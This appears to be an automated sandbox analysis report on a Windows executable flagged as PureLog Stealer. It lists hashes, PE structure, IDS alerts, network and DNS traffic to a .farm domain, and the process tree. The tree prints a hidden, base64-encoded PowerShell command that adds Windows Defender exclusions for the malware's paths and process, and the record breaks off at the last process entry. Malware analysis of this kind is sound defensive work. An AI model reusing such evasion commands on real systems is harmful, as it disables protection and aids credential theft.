                          SHA256:43261f85db3ab88ed6e6b00b4227c5e8e90ddbcabb491109196a0643aeb3d313
                          SHA512:0a5bf9c2eba71a6f313dae9c288c4e616a3661cfcfab00d30784719807006b734bd187e4c6050dda49736a11b003aa62f21bfac1958155b6308929c99ed4c23b
                          SSDEEP:96:UbeKbfVuzznTurnqqXz18S355vr0xvBRl4gLab/N6aigzQ7MzNt:UHwznTurnqqXx8A5ofto/caigzk2
                          TLSH:95E18510A3F94737DA670B7F9DB3964102B8FB118423CF6E2DC4920FAE11B955622B76
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....cpf.............................0... ...@....@.. ....................................`................................
                          Icon Hash:90cececece8e8eb0
                          Entrypoint:0x4030be
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Time Stamp:0x6670631C [Mon Jun 17 16:23:56 2024 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                          Instruction
                          jmp dword ptr [00402000h]
                          add byte ptr [eax], al (repeated 97 times: the bytes following the jump are zero padding, and 00 00 decodes as add byte ptr [eax], al)
                          Name | Virtual Address | Virtual Size | Is in Section
                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3074 | 0x4a | .text
                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4000 | 0x59e | .rsrc
                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6000 | 0xc | .reloc
                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                          .text | 0x2000 | 0x10c4 | 0x1200 | 076a523dfabfefb0396607bddfad06bb | False | 0.5251736111111112 | data | 5.167305380306296 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          .rsrc | 0x4000 | 0x59e | 0x600 | 3195e732dafe6dc871a7ce98075d5d4d | False | 0.4231770833333333 | data | 4.078999111395673 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .reloc | 0x6000 | 0xc | 0x200 | a7c8cac5b3f4d484fec827f05dbf629f | False | 0.04296875 | data | 0.07763316234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                          RT_VERSION | 0x405c | 0x31c | data | | | 0.42839195979899497
                          RT_MANIFEST | 0x43b4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
                          DLL | Import
                          mscoree.dll | _CorExeMain
                          Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                          06/17/24-16:18:47.509452 | TCP | 2017962 | ET TROJAN PE EXE or DLL Windows file download disguised as ASCII | 443 | 49732 | 188.114.96.3 | 192.168.2.4
                          06/17/24-16:18:41.893163 | TCP | 2017962 | ET TROJAN PE EXE or DLL Windows file download disguised as ASCII | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          06/17/24-16:18:41.893163 | TCP | 2022640 | ET TROJAN PE EXE or DLL Windows file download Text M2 | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          06/17/24-16:18:47.509452 | TCP | 2022640 | ET TROJAN PE EXE or DLL Windows file download Text M2 | 443 | 49732 | 188.114.96.3 | 192.168.2.4
                          06/17/24-16:18:42.601428 | TCP | 2020482 | ET CURRENT_EVENTS DRIVEBY GENERIC ShellExecute in Hex No Seps | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Jun 17, 2024 16:18:41.001208067 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.001266956 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.001329899 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.044262886 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.044298887 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.664727926 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.664844036 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.668445110 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.668497086 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.668910980 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.729975939 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.758552074 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.804507971 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.893158913 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.893233061 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.893282890 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.893317938 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.893337965 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.893354893 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.893390894 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.893486023 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.893534899 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.893562078 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.893582106 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.893629074 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:41.893639088 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:41.941934109 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.009377956 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.009463072 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.009500980 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.009516001 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.009543896 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.009589911 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.009598970 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.009861946 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.009917021 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.009922028 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.009938955 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.009977102 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.010402918 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.010492086 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.010529041 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.010529995 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.010543108 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.010586977 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.011332035 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.011710882 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.011755943 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.011771917 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.011842012 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.011885881 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.011887074 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.011899948 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.011949062 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.011956930 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.012551069 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.012600899 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.012615919 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.066966057 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.125917912 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.126000881 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.126044035 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.126072884 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.126121998 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.126178980 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.126195908 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.126399994 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.126441956 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.126446962 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.126461029 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.126521111 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.126528025 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.127085924 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.127129078 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.127131939 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.127141953 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.127188921 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.127943039 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.128002882 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.128766060 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.128822088 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.128832102 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.128897905 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.128953934 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.128962040 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.129009962 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.129703999 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.129772902 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.130559921 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.130614996 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.130624056 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.130635023 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.130659103 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.131438971 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.131495953 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.131504059 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.131552935 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.132299900 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Jun 17, 2024 16:18:42.132363081 CEST | 49731 | 443 | 192.168.2.4 | 188.114.96.3
                          Jun 17, 2024 16:18:42.133136988 CEST | 443 | 49731 | 188.114.96.3 | 192.168.2.4
                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                          Jun 17, 2024 16:18:40.972147942 CEST | 63179 | 53 | 192.168.2.4 | 1.1.1.1
                          Jun 17, 2024 16:18:40.995023966 CEST | 53 | 63179 | 1.1.1.1 | 192.168.2.4
                          Jun 17, 2024 16:18:58.221488953 CEST | 53773 | 53 | 192.168.2.4 | 1.1.1.1
                          Jun 17, 2024 16:18:58.263545990 CEST | 53 | 53773 | 1.1.1.1 | 192.168.2.4
                          Jun 17, 2024 16:19:02.075139046 CEST | 53 | 61178 | 1.1.1.1 | 192.168.2.4
                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                          Jun 17, 2024 16:18:40.972147942 CEST | 192.168.2.4 | 1.1.1.1 | 0xbfb9 | Standard query (0) | f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | A (IP address) | IN (0x0001) | false
                          Jun 17, 2024 16:18:58.221488953 CEST | 192.168.2.4 | 1.1.1.1 | 0xf997 | Standard query (0) | 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | A (IP address) | IN (0x0001) | false
                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                          Jun 17, 2024 16:18:40.995023966 CEST | 1.1.1.1 | 192.168.2.4 | 0xbfb9 | No error (0) | f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                          Jun 17, 2024 16:18:40.995023966 CEST | 1.1.1.1 | 192.168.2.4 | 0xbfb9 | No error (0) | f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                          Jun 17, 2024 16:18:58.263545990 CEST | 1.1.1.1 | 192.168.2.4 | 0xf997 | No error (0) | 1.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm | | 77.221.140.76 | A (IP address) | IN (0x0001) | false
                          • f.r14n788iocyo5epmpy6klmejchjtzddoekjlnt6mu3qh4de2i.farm
                          Target ID: 0
                          Start time: 10:18:40
                          Start date: 17/06/2024
                          Path: C:\Users\user\Desktop\file.exe
                          Wow64 process (32bit): true
                          Commandline: "C:\Users\user\Desktop\file.exe"
                          Imagebase: 0xdf0000
                          File size: 7'168 bytes
                          MD5 hash: AF4A6267CE7F24818FEEB7D2D62E72C2
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1790879005.00000000083C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1821399208.0000000009650000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1763526633.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1808267831.0000000008F40000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1783529566.0000000006B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1784663616.0000000006D60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1818030083.00000000094C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1767868411.000000000478C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1767868411.000000000459C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1830742150.000000000B070000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1767868411.0000000004378000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1763526633.0000000003526000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.1824447213.000000000A088000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1767868411.0000000005266000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1790879005.0000000007CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation: low
                          Has exited: true

                          Target ID: 1
                          Start time: 10:18:45
                          Start date: 17/06/2024
                          Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit): false
                          Commandline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                          Imagebase: 0x7ff788560000
                          File size: 452'608 bytes
                          MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: true

                          Target ID: 2
                          Start time: 10:18:45
                          Start date: 17/06/2024
                          Path: C:\Windows\System32\conhost.exe
                          Wow64 process (32bit): false
                          Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase: 0x7ff7699e0000
                          File size: 862'208 bytes
                          MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: true

                          Target ID: 3
                          Start time: 10:18:45
                          Start date: 17/06/2024
                          Path: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
                          Wow64 process (32bit): true
                          Commandline: C:\Users\user\AppData\Local\RegisteredChannels\hwrtalnmj\TypeId.exe
                          Imagebase: 0xea0000
                          File size: 7'168 bytes
                          MD5 hash: AF4A6267CE7F24818FEEB7D2D62E72C2
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1869188121.00000000047F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1869188121.0000000004131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000003.00000002.1869188121.00000000044B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1869188121.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.1841950156.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 13%, ReversingLabs
                          Reputation: low
                          Has exited: true

                          Target ID: 4
                          Start time: 10:18:52
                          Start date: 17/06/2024
                          Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Wow64 process (32bit): true
                          Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                          Imagebase: 0xd30000
                          File size: 42'064 bytes
                          MD5 hash: 5D4073B2EB6D217C19F2B22F21BF8D57
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3019858995.0000000004AB7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2976520133.000000000309D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.3095261684.0000000007491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.2976520133.0000000003200000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000004.00000002.3019858995.0000000004A62000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000004.00000002.3204622217.0000000009049000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3019858995.0000000004659000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.3019858995.0000000004058000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          Reputation: moderate
                          Has exited: false

                          Target ID: 6
                          Start time: 10:18:53
                          Start date: 17/06/2024
                          Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit): false
                          Commandline: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABqAG8AbgBlAHMAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVAB5AHAAZQBJAGQALgBlAHgAZQA7AA==
                          Imagebase: 0x7ff788560000
                          File size: 452'608 bytes
                          MD5 hash: 04029E121A0CFA5991749937DD22A1D9
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: true

                          Target ID: 7
                          Start time: 10:18:54
                          Start date: 17/06/2024
                          Path: C:\Windows\System32\conhost.exe
                          Wow64 process (32bit): false
                          Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase: 0x7ff7699e0000
                          File size: 862'208 bytes
                          MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges: true
                          Has administrator privileges: true
                          Programmed in: C, C++ or other language
                          Reputation: high
                          Has exited: true

                          Target ID: 11
                          Start time: 10:19:02
                          Start date: 17/06/2024
                          Path: C:\Users\user\AppData\Local\Temp\txxbiwtbs.exe
                          Wow64 process (32bit): true
